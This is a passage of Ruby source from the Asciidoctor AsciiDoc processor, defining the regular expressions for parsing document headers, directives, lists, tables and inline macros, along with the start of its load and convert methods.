if ::RUBY_MIN_VERSION_1_9
CC_WORD = '[:word:]'
CG_WORD = '[[:word:]]'
else
# NOTE Ruby 1.8 cannot match word characters beyond the ASCII range; if you need this feature, upgrade!
CC_WORD = '[:alnum:]_'
CG_WORD = '[[:alnum:]_]'
end
end
## Document header
# Matches the author info line immediately following the document title.
#
# Examples
#
# Doc Writer <[email protected]>
# Mary_Sue Brontë
#
AuthorInfoLineRx = /^(#{CG_WORD}[#{CC_WORD}\-'.]*)(?: +(#{CG_WORD}[#{CC_WORD}\-'.]*))?(?: +(#{CG_WORD}[#{CC_WORD}\-'.]*))?(?: +<([^>]+)>)?$/
# Matches the revision info line, which appears immediately following
# the author info line beneath the document title.
#
# Examples
#
# v1.0
# 2013-01-01
# v1.0, 2013-01-01: Ring in the new year release
# 1.0, Jan 01, 2013
#
RevisionInfoLineRx = /^(?:\D*(.*?),)?(?:\s*(?!:)(.*?))(?:\s*(?!^):\s*(.*))?$/
# Matches the title and volnum in the manpage doctype.
#
# Examples
#
# = asciidoctor ( 1 )
#
ManpageTitleVolnumRx = /^(.*)\((.*)\)$/
# Matches the name and purpose in the manpage doctype.
#
# Examples
#
# asciidoctor - converts AsciiDoc source files to HTML, DocBook and other formats
#
ManpageNamePurposeRx = /^(.*?)#{CG_BLANK}+-#{CG_BLANK}+(.*)$/
## Preprocessor directives
# Matches a conditional preprocessor directive (e.g., ifdef, ifndef, ifeval and endif).
#
# Examples
#
# ifdef::basebackend-html[]
# ifndef::theme[]
# ifeval::["{asciidoctor-version}" >= "0.1.0"]
# ifdef::asciidoctor[Asciidoctor!]
# endif::theme[]
# endif::basebackend-html[]
# endif::[]
#
ConditionalDirectiveRx = /^\\?(ifdef|ifndef|ifeval|endif)::(\S*?(?:([,\+])\S+?)?)\[(.+)?\]$/
# Matches a restricted (read as safe) eval expression.
#
# Examples
#
# "{asciidoctor-version}" >= "0.1.0"
#
EvalExpressionRx = /^(\S.*?)#{CG_BLANK}*(==|!=|<=|>=|<|>)#{CG_BLANK}*(\S.*)$/
# Matches an include preprocessor directive.
#
# Examples
#
# include::chapter1.ad[]
# include::example.txt[lines=1;2;5..10]
#
IncludeDirectiveRx = /^\\?include::([^\[]+)\[(.*?)\]$/
# Matches a trailing tag directive in an include file.
#
# Examples
#
# // tag::try-catch[]
# try {
# someMethod();
# catch (Exception e) {
# log(e);
# }
# // end::try-catch[]
TagDirectiveRx = /\b(?:tag|end)::\S+\[\]$/
## Attribute entries and references
# Matches a document attribute entry.
#
# Examples
#
# :foo: bar
# :First Name: Dan
# :sectnums!:
# :!toc:
# :long-entry: Attribute value lines ending in ' +'
# are joined together as a single value,
# collapsing the line breaks and indentation to
# a single space.
#
AttributeEntryRx = /^:(!?\w.*?):(?:#{CG_BLANK}+(.*))?$/
# Matches invalid characters in an attribute name.
InvalidAttributeNameCharsRx = /[^\w\-]/
# Matches the pass inline macro allowed in value of attribute assignment.
#
# Examples
#
# pass:[text]
#
AttributeEntryPassMacroRx = /^pass:([a-z,]*)\[(.*)\]$/
# Matches an inline attribute reference.
#
# Examples
#
# {foo}
# {counter:pcount:1}
# {set:foo:bar}
# {set:name!}
#
AttributeReferenceRx = /(\\)?\{((set|counter2?):.+?|\w+(?:[\-]\w+)*)(\\)?\}/
## Paragraphs and delimited blocks
# Matches an anchor (i.e., id + optional reference text) on a line above a block.
#
# Examples
#
# [[idname]]
# [[idname,Reference Text]]
#
BlockAnchorRx = /^\[\[(?:|([#{CC_ALPHA}:_][#{CC_WORD}:.-]*)(?:,#{CG_BLANK}*(\S.*))?)\]\]$/
# Matches an attribute list above a block element.
#
# Examples
#
# # strictly positional
# [quote, Adam Smith, Wealth of Nations]
#
# # name/value pairs
# [NOTE, caption="Good to know"]
#
# # as attribute reference
# [{lead}]
#
BlockAttributeListRx = /^\[(|#{CG_BLANK}*[#{CC_WORD}\{,.#"'%].*)\]$/
# A combined pattern that matches either a block anchor or a block attribute list.
#
# TODO this one gets hit a lot, should be optimized as much as possible
BlockAttributeLineRx = /^\[(|#{CG_BLANK}*[#{CC_WORD}\{,.#"'%].*|\[(?:|[#{CC_ALPHA}:_][#{CC_WORD}:.-]*(?:,#{CG_BLANK}*\S.*)?)\])\]$/
# Matches a title above a block.
#
# Examples
#
# .Title goes here
#
BlockTitleRx = /^\.([^\s.].*)$/
# Matches an admonition label at the start of a paragraph.
#
# Examples
#
# NOTE: Just a little note.
# TIP: Don't forget!
#
AdmonitionParagraphRx = /^(#{ADMONITION_STYLES.to_a * '|'}):#{CG_BLANK}/
# Matches a literal paragraph, which is a line of text preceded by at least one space.
#
# Examples
#
# <SPACE>Foo
# <TAB>Foo
LiteralParagraphRx = /^(#{CG_BLANK}+.*)$/
# Matches a comment block.
#
# Examples
#
# ////
# This is a block comment.
# It can span one or more lines.
# ////
CommentBlockRx = %r{^/{4,}$}
# Matches a comment line.
#
# Examples
#
# // an then whatever
#
CommentLineRx = %r{^//(?:[^/]|$)}
## Section titles
# Matches a single-line (Atx-style) section title.
#
# Examples
#
# == Foo
# # ^ a level 1 (h2) section title
#
# == Foo ==
# # ^ also a level 1 (h2) section title
#
# match[1] is the delimiter, whose length determines the level
# match[2] is the title itself
# match[3] is an inline anchor, which becomes the section id
AtxSectionRx = /^((?:=|#){1,6})#{CG_BLANK}+(\S.*?)(?:#{CG_BLANK}+\1)?$/
# Matches the restricted section name for a two-line (Setext-style) section title.
# The name cannot begin with a dot and has at least one alphanumeric character.
SetextSectionTitleRx = /^((?=.*#{CG_WORD}+.*)[^.].*?)$/
# Matches the underline in a two-line (Setext-style) section title.
#
# Examples
#
# ====== || ------ || ~~~~~~ || ^^^^^^ || ++++++
#
SetextSectionLineRx = /^(?:=|-|~|\^|\+)+$/
# Matches an anchor (i.e., id + optional reference text) inside a section title.
#
# Examples
#
# Section Title [[idname]]
# Section Title [[idname,Reference Text]]
#
InlineSectionAnchorRx = /^(.*?)#{CG_BLANK}+(\\)?\[\[([#{CC_ALPHA}:_][#{CC_WORD}:.-]*)(?:,#{CG_BLANK}*(\S.*?))?\]\]$/
# Matches invalid characters in a section id.
InvalidSectionIdCharsRx = /&(?:[a-zA-Z]{2,}|#\d{2,5}|#x[a-fA-F0-9]{2,4});|[^#{CC_WORD}]+?/
# Matches the block style used to designate a section title as a floating title.
#
# Examples
#
# [float]
# = Floating Title
#
FloatingTitleStyleRx = /^(?:float|discrete)\b/
## Lists
# Detects the start of any list item.
AnyListRx = /^(?:<?\d+>#{CG_BLANK}+#{CG_GRAPH}|#{CG_BLANK}*(?:-|(?:\*|\.|\u2022){1,5}|\d+\.|[a-zA-Z]\.|[IVXivx]+\))#{CG_BLANK}+#{CG_GRAPH}|#{CG_BLANK}*.*?(?::{2,4}|;;)(?:#{CG_BLANK}+#{CG_GRAPH}|$))/
# Matches an unordered list item (one level for hyphens, up to 5 levels for asterisks).
#
# Examples
#
# * Foo
# - Foo
#
# NOTE we know trailing (.*) will match at least one character because we strip trailing spaces
UnorderedListRx = /^#{CG_BLANK}*(-|\*{1,5}|\u2022{1,5})#{CG_BLANK}+(.*)$/
# Matches an ordered list item (explicit numbering or up to 5 consecutive dots).
#
# Examples
#
# . Foo
# .. Foo
# 1. Foo (arabic, default)
# a. Foo (loweralpha)
# A. Foo (upperalpha)
# i. Foo (lowerroman)
# I. Foo (upperroman)
#
# NOTE leading space match is not always necessary, but is used for list reader
# NOTE we know trailing (.*) will match at least one character because we strip trailing spaces
OrderedListRx = /^#{CG_BLANK}*(\.{1,5}|\d+\.|[a-zA-Z]\.|[IVXivx]+\))#{CG_BLANK}+(.*)$/
# Matches the ordinals for each type of ordered list.
OrderedListMarkerRxMap = {
:arabic => /\d+[.>]/,
:loweralpha => /[a-z]\./,
:lowerroman => /[ivx]+\)/,
:upperalpha => /[A-Z]\./,
:upperroman => /[IVX]+\)/
#:lowergreek => /[a-z]\]/
}
# Matches a definition list item.
#
# Examples
#
# foo::
# foo:::
# foo::::
# foo;;
#
# # should be followed by a definition, on the same line...
#
# foo:: That which precedes 'bar' (see also, <<bar>>)
#
# # ...or on a separate line
#
# foo::
# That which precedes 'bar' (see also, <<bar>>)
#
# # the term may be an attribute reference
#
# {foo_term}:: {foo_def}
#
# NOTE negative match for comment line is intentional since that isn't handled when looking for next list item
# QUESTION should we check for line comment in regex or when scanning the lines?
#
DefinitionListRx = /^(?!\/\/)#{CG_BLANK}*(.*?)(:{2,4}|;;)(?:#{CG_BLANK}+(.*))?$/
# Matches a sibling definition list item (which does not include the keyed type).
DefinitionListSiblingRx = {
# (?:.*?[^:])? - a non-capturing group which grabs longest sequence of characters that doesn't end w/ colon
'::' => /^(?!\/\/)#{CG_BLANK}*((?:.*[^:])?)(::)(?:#{CG_BLANK}+(.*))?$/,
':::' => /^(?!\/\/)#{CG_BLANK}*((?:.*[^:])?)(:::)(?:#{CG_BLANK}+(.*))?$/,
'::::' => /^(?!\/\/)#{CG_BLANK}*((?:.*[^:])?)(::::)(?:#{CG_BLANK}+(.*))?$/,
';;' => /^(?!\/\/)#{CG_BLANK}*(.*)(;;)(?:#{CG_BLANK}+(.*))?$/
}
# Matches a callout list item.
#
# Examples
#
# <1> Foo
#
# NOTE we know trailing (.*) will match at least one character because we strip trailing spaces
CalloutListRx = /^<?(\d+)>#{CG_BLANK}+(.*)/
# Matches a callout reference inside literal text.
#
# Examples
# <1> (optionally prefixed by //, #, -- or ;; line comment chars)
# <1> <2> (multiple callouts on one line)
# <!--1--> (for XML-based languages)
#
# NOTE extract regexps are applied line-by-line, so we can use $ as end-of-line char
CalloutExtractRx = /(?:(?:\/\/|#|--|;;) ?)?(\\)?<!?(--|)(\d+)\2>(?=(?: ?\\?<!?\2\d+\2>)*$)/
CalloutExtractRxt = '(\\\\)?<()(\\d+)>(?=(?: ?\\\\?<\\d+>)*$)'
# NOTE special characters have not been replaced when scanning
CalloutQuickScanRx = /\\?<!?(--|)(\d+)\1>(?=(?: ?\\?<!?\1\d+\1>)*#{CC_EOL})/
# NOTE special characters have already been replaced when converting to an SGML format
CalloutSourceRx = /(?:(?:\/\/|#|--|;;) ?)?(\\)?<!?(--|)(\d+)\2>(?=(?: ?\\?<!?\2\d+\2>)*#{CC_EOL})/
CalloutSourceRxt = "(\\\\)?<()(\\d+)>(?=(?: ?\\\\?<\\d+>)*#{CC_EOL})"
# A Hash of regexps for lists used for dynamic access.
ListRxMap = {
:ulist => UnorderedListRx,
:olist => OrderedListRx,
:dlist => DefinitionListRx,
:colist => CalloutListRx
}
## Tables
# Parses the column spec (i.e., colspec) for a table.
#
# Examples
#
# 1*h,2*,^3e
#
ColumnSpecRx = /^(?:(\d+)\*)?([<^>](?:\.[<^>]?)?|(?:[<^>]?\.)?[<^>])?(\d+%?)?([a-z])?$/
# Parses the start and end of a cell spec (i.e., cellspec) for a table.
#
# Examples
#
# 2.3+<.>m
#
# FIXME use step-wise scan (or treetop) rather than this mega-regexp
CellSpecStartRx = /^#{CG_BLANK}*(?:(\d+(?:\.\d*)?|(?:\d*\.)?\d+)([*+]))?([<^>](?:\.[<^>]?)?|(?:[<^>]?\.)?[<^>])?([a-z])?$/
CellSpecEndRx = /#{CG_BLANK}+(?:(\d+(?:\.\d*)?|(?:\d*\.)?\d+)([*+]))?([<^>](?:\.[<^>]?)?|(?:[<^>]?\.)?[<^>])?([a-z])?$/
# Block macros
# Matches the general block macro pattern.
#
# Examples
#
# gist::123456[]
#
#--
# NOTE we've relaxed the match for target to accomodate the short format (e.g., name::[attrlist])
GenericBlockMacroRx = /^(#{CG_WORD}+)::(\S*?)\[((?:\\\]|[^\]])*?)\]$/
# Matches an image, video or audio block macro.
#
# Examples
#
# image::filename.png[Caption]
# video::http://youtube.com/12345[Cats vs Dogs]
#
MediaBlockMacroRx = /^(image|video|audio)::(\S+?)\[((?:\\\]|[^\]])*?)\]$/
# Matches the TOC block macro.
#
# Examples
#
# toc::[]
# toc::[levels=2]
#
TocBlockMacroRx = /^toc::\[(.*?)\]$/
## Inline macros
# Matches an anchor (i.e., id + optional reference text) in the flow of text.
#
# Examples
#
# [[idname]]
# [[idname,Reference Text]]
# anchor:idname[]
# anchor:idname[Reference Text]
#
InlineAnchorRx = /\\?(?:\[\[([#{CC_ALPHA}:_][#{CC_WORD}:.-]*)(?:,#{CG_BLANK}*(\S.*?))?\]\]|anchor:(\S+)\[(.*?[^\\])?\])/
# Matches a bibliography anchor anywhere inline.
#
# Examples
#
# [[[Foo]]]
#
InlineBiblioAnchorRx = /\\?\[\[\[([#{CC_WORD}:][#{CC_WORD}:.-]*?)\]\]\]/
# Matches an inline e-mail address.
#
# [email protected]
#
EmailInlineMacroRx = /([\\>:\/])?#{CG_WORD}[#{CC_WORD}.%+-]*@#{CG_ALNUM}[#{CC_ALNUM}.-]*\.#{CG_ALPHA}{2,4}\b/
# Matches an inline footnote macro, which is allowed to span multiple lines.
#
# Examples
# footnote:[text]
# footnoteref:[id,text]
# footnoteref:[id]
#
FootnoteInlineMacroRx = /\\?(footnote(?:ref)?):\[(#{CC_ALL}*?[^\\])\]/m
# Matches an image or icon inline macro.
#
# Examples
#
# image:filename.png[Alt Text]
# image:http://example.com/images/filename.png[Alt Text]
# image:filename.png[More [Alt\] Text] (alt text becomes "More [Alt] Text")
# icon:github[large]
#
ImageInlineMacroRx = /\\?(?:image|icon):([^:\[][^\[]*)\[((?:\\\]|[^\]])*?)\]/
# Matches an indexterm inline macro, which may span multiple lines.
#
# Examples
#
# indexterm:[Tigers,Big cats]
# (((Tigers,Big cats)))
# indexterm2:[Tigers]
# ((Tigers))
#
IndextermInlineMacroRx = /\\?(?:(indexterm2?):\[(#{CC_ALL}*?[^\\])\]|\(\((#{CC_ALL}+?)\)\)(?!\)))/m
# Matches either the kbd or btn inline macro.
#
# Examples
#
# kbd:[F3]
# kbd:[Ctrl+Shift+T]
# kbd:[Ctrl+\]]
# kbd:[Ctrl,T]
# btn:[Save]
#
KbdBtnInlineMacroRx = /\\?(?:kbd|btn):\[((?:\\\]|[^\]])+?)\]/
# Matches the delimiter used for kbd value.
#
# Examples
#
# Ctrl + Alt+T
# Ctrl,T
#
KbdDelimiterRx = /(?:\+|,)(?=#{CG_BLANK}*[^\1])/
# Matches an implicit link and some of the link inline macro.
#
# Examples
#
# http://github.com
# http://github.com[GitHub]
#
# FIXME revisit! the main issue is we need different rules for implicit vs explicit
LinkInlineRx = %r{(^|link:|<|[\s>\(\)\[\];])(\\?(?:https?|file|ftp|irc)://[^\s\[\]<]*[^\s.,\[\]<])(?:\[((?:\\\]|[^\]])*?)\])?}
# Match a link or e-mail inline macro.
#
# Examples
#
# link:path[label]
# mailto:[email protected][]
#
LinkInlineMacroRx = /\\?(?:link|mailto):([^\s\[]+)(?:\[((?:\\\]|[^\]])*?)\])/
# Matches a stem (and alternatives, asciimath and latexmath) inline macro, which may span multiple lines.
#
# Examples
#
# stem:[x != 0]
# asciimath:[x != 0]
# latexmath:[\sqrt{4} = 2]
#
StemInlineMacroRx = /\\?(stem|(?:latex|ascii)math):([a-z,]*)\[(#{CC_ALL}*?[^\\])\]/m
# Matches a menu inline macro.
#
# Examples
#
# menu:File[New...]
# menu:View[Page Style > No Style]
# menu:View[Page Style, No Style]
#
MenuInlineMacroRx = /\\?menu:(#{CG_WORD}|#{CG_WORD}.*?\S)\[#{CG_BLANK}*(.+?)?\]/
# Matches an implicit menu inline macro.
#
# Examples
#
# "File > New..."
#
MenuInlineRx = /\\?"(#{CG_WORD}[^"]*?#{CG_BLANK}*>#{CG_BLANK}*[^" \t][^"]*)"/
# Matches an inline passthrough value, which may span multiple lines.
#
# Examples
#
# +text+
# `text` (compat)
#
# NOTE we always capture the attributes so we know when to use compatible (i.e., legacy) behavior
PassInlineRx = {
false => ['+', '`', /(^|[^#{CC_WORD};:])(?:\[([^\]]+?)\])?(\\?(\+|`)(\S|\S#{CC_ALL}*?\S)\4)(?!#{CG_WORD})/m],
true => ['`', nil, /(^|[^`#{CC_WORD}])(?:\[([^\]]+?)\])?(\\?(`)([^`\s]|[^`\s]#{CC_ALL}*?\S)\4)(?![`#{CC_WORD}])/m]
}
# Matches several variants of the passthrough inline macro, which may span multiple lines.
#
# Examples
#
# +++text+++
# $$text$$
# pass:quotes[text]
#
PassInlineMacroRx = /(?:(?:(\\?)\[([^\]]+?)\])?(\\{0,2})(\+{2,3}|\${2})(#{CC_ALL}*?)\4|(\\?)pass:([a-z,]*)\[(#{CC_ALL}*?[^\\])\])/m
# Matches an xref (i.e., cross-reference) inline macro, which may span multiple lines.
#
# Examples
#
# <<id,reftext>>
# xref:id[reftext]
#
# NOTE special characters have already been escaped, hence the entity references
XrefInlineMacroRx = /\\?(?:<<([#{CC_WORD}":.\/]#{CC_ALL}*?)>>|xref:([#{CC_WORD}":.\/]#{CC_ALL}*?)\[(#{CC_ALL}*?)\])/m
## Layout
# Matches a trailing + preceded by at least one space character,
# which forces a hard line break (<br> tag in HTML outputs).
#
# Examples
#
# +
# Foo +
#
if RUBY_ENGINE == 'opal'
# NOTE JavaScript only treats ^ and $ as line boundaries in multiline regexp; . won't match newlines
LineBreakRx = /^(.*)[ \t]\+$/m
else
LineBreakRx = /^(.*)[[:blank:]]\+$/
end
# Matches an AsciiDoc horizontal rule or AsciiDoc page break.
#
# Examples
#
# ''' (horizontal rule)
# <<< (page break)
#
LayoutBreakLineRx = /^('|<){3,}$/
# Matches an AsciiDoc or Markdown horizontal rule or AsciiDoc page break.
#
# Examples
#
# ''' or ' ' ' (horizontal rule)
# --- or - - - (horizontal rule)
# *** or * * * (horizontal rule)
# <<< (page break)
#
LayoutBreakLinePlusRx = /^(?:'|<){3,}$|^ {0,3}([-\*_])( *)\1\2\1$/
## General
# Matches a blank line.
#
# NOTE allows for empty space in line as it could be left by the template engine
BlankLineRx = /^#{CG_BLANK}*\n/
# Matches a comma or semi-colon delimiter.
#
# Examples
#
# one,two
# three;four
#
DataDelimiterRx = /,|;/
# Matches a single-line of text enclosed in double quotes, capturing the quote char and text.
#
# Examples
#
# "Who goes there?"
#
DoubleQuotedRx = /^("|)(.*)\1$/
# Matches multiple lines of text enclosed in double quotes, capturing the quote char and text.
#
# Examples
#
# "I am a run-on sentence and I like
# to take up multiple lines and I
# still want to be matched."
#
DoubleQuotedMultiRx = /^("|)(#{CC_ALL}*)\1$/m
# Matches one or more consecutive digits at the end of a line.
#
# Examples
#
# docbook45
# html5
#
TrailingDigitsRx = /\d+$/
# Matches a space escaped by a backslash.
#
# Examples
#
# one\ two\ three
#
EscapedSpaceRx = /\\(#{CG_BLANK})/
# Matches a space delimiter that's not escaped.
#
# Examples
#
# one two three four
#
SpaceDelimiterRx = /([^\\])#{CG_BLANK}+/
# Matches a + or - modifier in a subs list
#
SubModifierSniffRx = /[+-]/
# Matches any character with multibyte support explicitly enabled (length of multibyte char = 1)
#
# NOTE If necessary to hide use of the language modifier (u) from JavaScript, use (Regexp.new '.', false, 'u')
#
UnicodeCharScanRx = unless RUBY_ENGINE == 'opal'
FORCE_UNICODE_LINE_LENGTH ? /./u : nil
end
# Detects strings that resemble URIs.
#
# Examples
# http://domain
# https://domain
# file:///path
# data:info
#
# not c:/sample.adoc or c:\sample.adoc
#
UriSniffRx = %r{^#{CG_ALPHA}[#{CC_ALNUM}.+-]+:/{0,2}}
# Detects the end of an implicit URI in the text
#
# Examples
#
# (http://google.com)
# >http://google.com<
# (See http://google.com):
#
UriTerminator = /[);:]$/
# Detects XML tags
XmlSanitizeRx = /<[^>]+>/
# Unused
# Detects any fenced block delimiter, including:
# listing, literal, example, sidebar, quote, passthrough, table and fenced code
# Does not match open blocks or air quotes
# TIP position the most common blocks towards the front of the pattern
#BlockDelimiterRx = %r{^(?:(?:-|\.|=|\*|_|\+|/){4,}|[\|,;!]={3,}|(?:`|~){3,}.*)$}
# Matches an escaped single quote within a word
#
# Examples
#
# Here\'s Johnny!
#
#EscapedSingleQuoteRx = /(#{CG_WORD})\\'(#{CG_WORD})/
# an alternative if our backend generates single-quoted html/xml attributes
#EscapedSingleQuoteRx = /(#{CG_WORD}|=)\\'(#{CG_WORD})/
# Matches whitespace at the beginning of the line
#LeadingSpacesRx = /^(#{CG_BLANK}*)/
# Matches parent directory references at the beginning of a path
#LeadingParentDirsRx = /^(?:\.\.\/)*/
#StripLineWise = /\A(?:\s*\n)?(#{CC_ALL}*?)\s*\z/m
#end
INTRINSIC_ATTRIBUTES = {
'startsb' => '[',
'endsb' => ']',
'vbar' => '|',
'caret' => '^',
'asterisk' => '*',
'tilde' => '~',
'plus' => '+',
'backslash' => '\\',
'backtick' => '`',
'blank' => '',
'empty' => '',
'sp' => ' ',
'two-colons' => '::',
'two-semicolons' => ';;',
'nbsp' => ' ',
'deg' => '°',
'zwsp' => '​',
'quot' => '"',
'apos' => ''',
'lsquo' => '‘',
'rsquo' => '’',
'ldquo' => '“',
'rdquo' => '”',
'wj' => '⁠',
'brvbar' => '¦',
'cpp' => 'C++',
'amp' => '&',
'lt' => '<',
'gt' => '>'
}
# unconstrained quotes:: can appear anywhere
# constrained quotes:: must be bordered by non-word characters
# NOTE these substitutions are processed in the order they appear here and
# the order in which they are replaced is important
quote_subs = [
# **strong**
[:strong, :unconstrained, /\\?(?:\[([^\]]+?)\])?\*\*(#{CC_ALL}+?)\*\*/m],
# *strong*
[:strong, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+?)\])?\*(\S|\S#{CC_ALL}*?\S)\*(?!#{CG_WORD})/m],
# "`double-quoted`"
[:double, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+?)\])?"`(\S|\S#{CC_ALL}*?\S)`"(?!#{CG_WORD})/m],
# '`single-quoted`'
[:single, :constrained, /(^|[^#{CC_WORD};:`}])(?:\[([^\]]+?)\])?'`(\S|\S#{CC_ALL}*?\S)`'(?!#{CG_WORD})/m],
# ``monospaced``
[:monospaced, :unconstrained, /\\?(?:\[([^\]]+?)\])?``(#{CC_ALL}+?)``/m],
# `monospaced`
[:monospaced, :constrained, /(^|[^#{CC_WORD};:"'`}])(?:\[([^\]]+?)\])?`(\S|\S#{CC_ALL}*?\S)`(?![#{CC_WORD}"'`])/m],
# __emphasis__
[:emphasis, :unconstrained, /\\?(?:\[([^\]]+?)\])?__(#{CC_ALL}+?)__/m],
# _emphasis_
[:emphasis, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+?)\])?_(\S|\S#{CC_ALL}*?\S)_(?!#{CG_WORD})/m],
# ##mark## (referred to in AsciiDoc Python as unquoted)
[:mark, :unconstrained, /\\?(?:\[([^\]]+?)\])?##(#{CC_ALL}+?)##/m],
# #mark# (referred to in AsciiDoc Python as unquoted)
[:mark, :constrained, /(^|[^#{CC_WORD}&;:}])(?:\[([^\]]+?)\])?#(\S|\S#{CC_ALL}*?\S)#(?!#{CG_WORD})/m],
# ^superscript^
[:superscript, :unconstrained, /\\?(?:\[([^\]]+?)\])?\^(\S+?)\^/],
# ~subscript~
[:subscript, :unconstrained, /\\?(?:\[([^\]]+?)\])?~(\S+?)~/]
]
compat_quote_subs = quote_subs.dup
# ``quoted''
compat_quote_subs[2] = [:double, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+?)\])?``(\S|\S#{CC_ALL}*?\S)''(?!#{CG_WORD})/m]
# `quoted'
compat_quote_subs[3] = [:single, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+?)\])?`(\S|\S#{CC_ALL}*?\S)'(?!#{CG_WORD})/m]
# ++monospaced++
compat_quote_subs[4] = [:monospaced, :unconstrained, /\\?(?:\[([^\]]+?)\])?\+\+(#{CC_ALL}+?)\+\+/m]
# +monospaced+
compat_quote_subs[5] = [:monospaced, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+?)\])?\+(\S|\S#{CC_ALL}*?\S)\+(?!#{CG_WORD})/m]
# #unquoted#
#compat_quote_subs[8] = [:unquoted, *compat_quote_subs[8][1..-1]]
# ##unquoted##
#compat_quote_subs[9] = [:unquoted, *compat_quote_subs[9][1..-1]]
# 'emphasis'
compat_quote_subs.insert 3, [:emphasis, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+?)\])?'(\S|\S#{CC_ALL}*?\S)'(?!#{CG_WORD})/m]
QUOTE_SUBS = {
false => quote_subs,
true => compat_quote_subs
}
quote_subs = nil
compat_quote_subs = nil
# NOTE in Ruby 1.8.7, [^\\] does not match start of line,
# so we need to match it explicitly
# order is significant
REPLACEMENTS = [
# (C)
[/\\?\(C\)/, '©', :none],
# (R)
[/\\?\(R\)/, '®', :none],
# (TM)
[/\\?\(TM\)/, '™', :none],
# foo -- bar
# FIXME this drops the endline if it appears at end of line
[/(^|\n| |\\)--( |\n|$)/, ' — ', :none],
# foo--bar
[/(#{CG_WORD})\\?--(?=#{CG_WORD})/, '—​', :leading],
# ellipsis
[/\\?\.\.\./, '…​', :leading],
# right single quote
[/\\?`'/, '’', :none],
# apostrophe (inside a word)
[/(#{CG_ALNUM})\\?'(?=#{CG_ALPHA})/, '’', :leading],
# right arrow ->
[/\\?->/, '→', :none],
# right double arrow =>
[/\\?=>/, '⇒', :none],
# left arrow <-
[/\\?<-/, '←', :none],
# left double arrow <=
[/\\?<=/, '⇐', :none],
# restore entities
[/\\?(&)amp;((?:[a-zA-Z]+|#\d{2,5}|#x[a-fA-F0-9]{2,4});)/, '', :bounding]
]
class << self
# Public: Parse the AsciiDoc source input into a {Document}
#
# Accepts input as an IO (or StringIO), String or String Array object. If the
# input is a File, information about the file is stored in attributes on the
# Document object.
#
# input - the AsciiDoc source as a IO, String or Array.
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See {Document#initialize} for details about these options.
#
# Returns the Document
def load input, options = {}
options = options.dup
if (timings = options[:timings])
timings.start :read
end
attributes = options[:attributes] = if !(attrs = options[:attributes])
{}
elsif ::Hash === attrs || (::RUBY_ENGINE_JRUBY && ::Java::JavaUtil::Map === attrs)
attrs.dup
elsif ::Array === attrs
attrs.inject({}) do |accum, entry|
k, v = entry.split '=', 2
accum[k] = v || ''
accum
end
elsif ::String === attrs
# convert non-escaped spaces into null character, so we split on the
# correct spaces chars, and restore escaped spaces
capture_1 = '\1'
attrs = attrs.gsub(SpaceDelimiterRx, %(#{capture_1}#{NULL})).gsub(EscapedSpaceRx, capture_1)
attrs.split(NULL).inject({}) do |accum, entry|
k, v = entry.split '=', 2
accum[k] = v || ''
accum
end
elsif (attrs.respond_to? :keys) && (attrs.respond_to? :[])
# convert it to a Hash as we know it
original_attrs = attrs
attrs = {}
original_attrs.keys.each do |key|
attrs[key] = original_attrs[key]
end
attrs
else
raise ::ArgumentError, %(illegal type for attributes option: #{attrs.class.ancestors})
end
lines = nil
if ::File === input
# TODO cli checks if input path can be read and is file, but might want to add check to API
input_path = ::File.expand_path input.path
input_mtime = input.mtime
lines = input.readlines
# hold off on setting infile and indir until we get a better sense of their purpose
attributes['docfile'] = input_path
attributes['docdir'] = ::File.dirname input_path
attributes['docname'] = Helpers.basename input_path, true
docdate = (attributes['docdate'] ||= input_mtime.strftime('%Y-%m-%d'))
doctime = (attributes['doctime'] ||= input_mtime.strftime('%H:%M:%S %Z'))
attributes['docdatetime'] = %(#{docdate} #{doctime})
elsif input.respond_to? :readlines
# NOTE tty, pipes & sockets can't be rewound, but can't be sniffed easily either
# just fail the rewind operation silently to handle all cases
begin
input.rewind
rescue
end
lines = input.readlines
elsif ::String === input
lines = input.lines.entries
elsif ::Array === input
lines = input.dup
else
raise ::ArgumentError, %(unsupported input type: #{input.class})
end
if timings
timings.record :read
timings.start :parse
end
if options[:parse] == false
doc = Document.new lines, options
else
doc = (Document.new lines, options).parse
end
timings.record :parse if timings
doc
rescue => ex
begin
context = %(asciidoctor: FAILED: #{attributes['docfile'] || '<stdin>'}: Failed to load AsciiDoc document)
if ex.respond_to? :exception
# The original message must be explicitely preserved when wrapping a Ruby exception
wrapped_ex = ex.exception %(#{context} - #{ex.message})
# JRuby automatically sets backtrace, but not MRI
wrapped_ex.set_backtrace ex.backtrace
else
# Likely a Java exception class
wrapped_ex = ex.class.new context, ex
wrapped_ex.stack_trace = ex.stack_trace
end
rescue
wrapped_ex = ex
end
raise wrapped_ex
end
# Public: Parse the contents of the AsciiDoc source file into an Asciidoctor::Document
#
# Accepts input as an IO, String or String Array object. If the
# input is a File, information about the file is stored in
# attributes on the Document.
#
# input - the String AsciiDoc source filename
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See Asciidoctor::Document#initialize for details about options.
#
# Returns the Asciidoctor::Document
def load_file filename, options = {}
self.load ::File.new(filename || ''), options
end
# Public: Parse the AsciiDoc source input into an Asciidoctor::Document and
# convert it to the specified backend format.
#
# Accepts input as an IO, String or String Array object. If the
# input is a File, information about the file is stored in
# attributes on the Document.
#
# If the :in_place option is true, and the input is a File, the output is
# written to a file adjacent to the input file, having an extension that
# corresponds to the backend format. Otherwise, if the :to_file option is
# specified, the file is written to that file. If :to_file is not an absolute
# path, it is resolved relative to :to_dir, if given, otherwise the
# Document#base_dir. If the target directory does not exist, it will not be
# created unless the :mkdirs option is set to true. If the file cannot be
# written because the target directory does not exist, or because it falls
# outside of the Document#base_dir in safe mode, an IOError is raised.
#
# If the output is going to be written to a file, the header and footer are
# included unless specified otherwise (writing to a file implies creating a
# standalone document). Otherwise, the header and footer are not included by
# default and the converted result is returned.
#
# input - the String AsciiDoc source filename
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See Asciidoctor::Document#initialize for details about options.
#
# Returns the Document object if the converted String is written to a
# file, otherwise the converted String
def convert input, options = {}
options = options.dup
options.delete(:parse)
to_file = options.delete(:to_file)
